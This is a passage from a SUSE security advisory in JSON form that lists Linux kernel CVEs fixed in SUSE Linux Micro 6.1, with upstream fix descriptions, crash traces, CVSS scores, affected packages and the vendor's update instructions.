"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54314"
},
{
"cve": "CVE-2023-54315",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54315"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/powernv/sriov: perform null check on iov before dereferencing iov\n\nCurrently pointer iov is being dereferenced before the null check of iov\nwhich can lead to null pointer dereference errors. Fix this by moving the\niov null check before the dereferencing.\n\nDetected using cppcheck static analysis:\nlinux/arch/powerpc/platforms/powernv/pci-sriov.c:597:12: warning: Either\nthe condition \u0027!iov\u0027 is redundant or there is possible null pointer\ndereference: iov. [nullPointerRedundantCheck]\n num_vfs = iov-\u003enum_vfs;\n ^",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54315",
"url": "https://www.suse.com/security/cve/CVE-2023-54315"
},
{
"category": "external",
"summary": "SUSE Bug 1255769 for CVE-2023-54315",
"url": "https://bugzilla.suse.com/1255769"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54315"
},
{
"cve": "CVE-2023-54316",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54316"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nrefscale: Fix uninitalized use of wait_queue_head_t\n\nRunning the refscale test occasionally crashes the kernel with the\nfollowing error:\n\n[ 8569.952896] BUG: unable to handle page fault for address: ffffffffffffffe8\n[ 8569.952900] #PF: supervisor read access in kernel mode\n[ 8569.952902] #PF: error_code(0x0000) - not-present page\n[ 8569.952904] PGD c4b048067 P4D c4b049067 PUD c4b04b067 PMD 0\n[ 8569.952910] Oops: 0000 [#1] PREEMPT_RT SMP NOPTI\n[ 8569.952916] Hardware name: Dell Inc. PowerEdge R750/0WMWCR, BIOS 1.2.4 05/28/2021\n[ 8569.952917] RIP: 0010:prepare_to_wait_event+0x101/0x190\n :\n[ 8569.952940] Call Trace:\n[ 8569.952941] \u003cTASK\u003e\n[ 8569.952944] ref_scale_reader+0x380/0x4a0 [refscale]\n[ 8569.952959] kthread+0x10e/0x130\n[ 8569.952966] ret_from_fork+0x1f/0x30\n[ 8569.952973] \u003c/TASK\u003e\n\nThe likely cause is that init_waitqueue_head() is called after the call to\nthe torture_create_kthread() function that creates the ref_scale_reader\nkthread. Although this init_waitqueue_head() call will very likely\ncomplete before this kthread is created and starts running, it is\npossible that the calling kthread will be delayed between the calls to\ntorture_create_kthread() and init_waitqueue_head(). In this case, the\nnew kthread will use the waitqueue head before it is properly initialized,\nwhich is not good for the kernel\u0027s health and well-being.\n\nThe above crash happened here:\n\n\tstatic inline void __add_wait_queue(...)\n\t{\n\t\t:\n\t\tif (!(wq-\u003eflags \u0026 WQ_FLAG_PRIORITY)) \u003c=== Crash here\n\nThe offset of flags from list_head entry in wait_queue_entry is\n-0x18. If reader_tasks[i].wq.head.next is NULL as allocated reader_task\nstructure is zero initialized, the instruction will try to access address\n0xffffffffffffffe8, which is exactly the fault address listed above.\n\nThis commit therefore invokes init_waitqueue_head() before creating\nthe kthread.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54316",
"url": "https://www.suse.com/security/cve/CVE-2023-54316"
},
{
"category": "external",
"summary": "SUSE Bug 1255770 for CVE-2023-54316",
"url": "https://bugzilla.suse.com/1255770"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54316"
},
{
"cve": "CVE-2023-54318",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54318"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/smc: use smc_lgr_list.lock to protect smc_lgr_list.list iterate in smcr_port_add\n\nWhile doing smcr_port_add, there maybe linkgroup add into or delete\nfrom smc_lgr_list.list at the same time, which may result kernel crash.\nSo, use smc_lgr_list.lock to protect smc_lgr_list.list iterate in\nsmcr_port_add.\n\nThe crash calltrace show below:\nBUG: kernel NULL pointer dereference, address: 0000000000000000\nPGD 0 P4D 0\nOops: 0000 [#1] SMP NOPTI\nCPU: 0 PID: 559726 Comm: kworker/0:92 Kdump: loaded Tainted: G\nHardware name: Alibaba Cloud Alibaba Cloud ECS, BIOS 449e491 04/01/2014\nWorkqueue: events smc_ib_port_event_work [smc]\nRIP: 0010:smcr_port_add+0xa6/0xf0 [smc]\nRSP: 0000:ffffa5a2c8f67de0 EFLAGS: 00010297\nRAX: 0000000000000001 RBX: ffff9935e0650000 RCX: 0000000000000000\nRDX: 0000000000000010 RSI: ffff9935e0654290 RDI: ffff9935c8560000\nRBP: 0000000000000000 R08: 0000000000000000 R09: ffff9934c0401918\nR10: 0000000000000000 R11: ffffffffb4a5c278 R12: ffff99364029aae4\nR13: ffff99364029aa00 R14: 00000000ffffffed R15: ffff99364029ab08\nFS: 0000000000000000(0000) GS:ffff994380600000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000000 CR3: 0000000f06a10003 CR4: 0000000002770ef0\nPKRU: 55555554\nCall Trace:\n smc_ib_port_event_work+0x18f/0x380 [smc]\n process_one_work+0x19b/0x340\n worker_thread+0x30/0x370\n ? process_one_work+0x340/0x340\n kthread+0x114/0x130\n ? __kthread_cancel_work+0x50/0x50\n ret_from_fork+0x1f/0x30",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54318",
"url": "https://www.suse.com/security/cve/CVE-2023-54318"
},
{
"category": "external",
"summary": "SUSE Bug 1255772 for CVE-2023-54318",
"url": "https://bugzilla.suse.com/1255772"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54318"
},
{
"cve": "CVE-2023-54319",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54319"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npinctrl: at91-pio4: check return value of devm_kasprintf()\n\ndevm_kasprintf() returns a pointer to dynamically allocated memory.\nPointer could be NULL in case allocation fails. Check pointer validity.\nIdentified with coccinelle (kmerr.cocci script).\n\nDepends-on: 1c4e5c470a56 (\"pinctrl: at91: use devm_kasprintf() to avoid potential leaks\")\nDepends-on: 5a8f9cf269e8 (\"pinctrl: at91-pio4: use proper format specifier for unsigned int\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54319",
"url": "https://www.suse.com/security/cve/CVE-2023-54319"
},
{
"category": "external",
"summary": "SUSE Bug 1255760 for CVE-2023-54319",
"url": "https://bugzilla.suse.com/1255760"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54319"
},
{
"cve": "CVE-2023-54322",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54322"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\narm64: set __exception_irq_entry with __irq_entry as a default\n\nfilter_irq_stacks() is supposed to cut entries which are related irq entries\nfrom its call stack.\nAnd in_irqentry_text() which is called by filter_irq_stacks()\nuses __irqentry_text_start/end symbol to find irq entries in callstack.\n\nBut it doesn\u0027t work correctly as without \"CONFIG_FUNCTION_GRAPH_TRACER\",\narm64 kernel doesn\u0027t include gic_handle_irq which is entry point of arm64 irq\nbetween __irqentry_text_start and __irqentry_text_end as we discussed in below link.\nhttps://lore.kernel.org/all/CACT4Y+aReMGLYua2rCLHgFpS9io5cZC04Q8GLs-uNmrn1ezxYQ@mail.gmail.com/#t\n\nThis problem can makes unintentional deep call stack entries especially\nin KASAN enabled situation as below.\n\n[ 2479.383395]I[0:launcher-loader: 1719] Stack depot reached limit capacity\n[ 2479.383538]I[0:launcher-loader: 1719] WARNING: CPU: 0 PID: 1719 at lib/stackdepot.c:129 __stack_depot_save+0x464/0x46c\n[ 2479.385693]I[0:launcher-loader: 1719] pstate: 624000c5 (nZCv daIF +PAN -UAO +TCO -DIT 